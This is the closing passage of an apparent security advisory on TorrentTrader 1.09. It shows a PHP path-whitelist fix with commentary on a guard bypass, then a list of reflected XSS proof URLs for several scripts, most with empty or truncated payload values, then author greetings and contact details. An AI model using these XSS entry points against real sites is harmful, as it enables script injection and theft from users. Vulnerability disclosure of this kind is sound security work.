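    if ($dirs === false) {
        return null;
    }
    $known = array_map('basename', $dirs);
    if (!in_array($ss_uri, $known, true)) {
        return null;
    }
    return $themes_dir . '/' . $ss_uri . '/block.php';
}
// Usage (constructed): $block = theme_block_path('./themes', $ss_uri);
//                      if ($block === null) { exit; } require_once $block;
```

With the test URI from the advisory, `original_guard_blocks('/torrenttrader109/backend/Admin-functions.php')` is `false`, which is exactly the bypass; `is_direct_access()` does not look at the URI at all.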


22. Reflected XSS in multiple scripts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Examples:

http://localhost/torrenttrader109/themes/default/footer.php?ttversion=
http://localhost/torrenttrader109/themes/default/header.php?SITENAME=">
http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]=
http://localhost/torrenttrader109/visitorstoday.php?todayactive=
http://localhost/torrenttrader109/visitorsnow.php?activepeople=
http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1
http://localhost/torrenttrader109/torrents-details.php?id=1&keepget=">


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who knows me!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------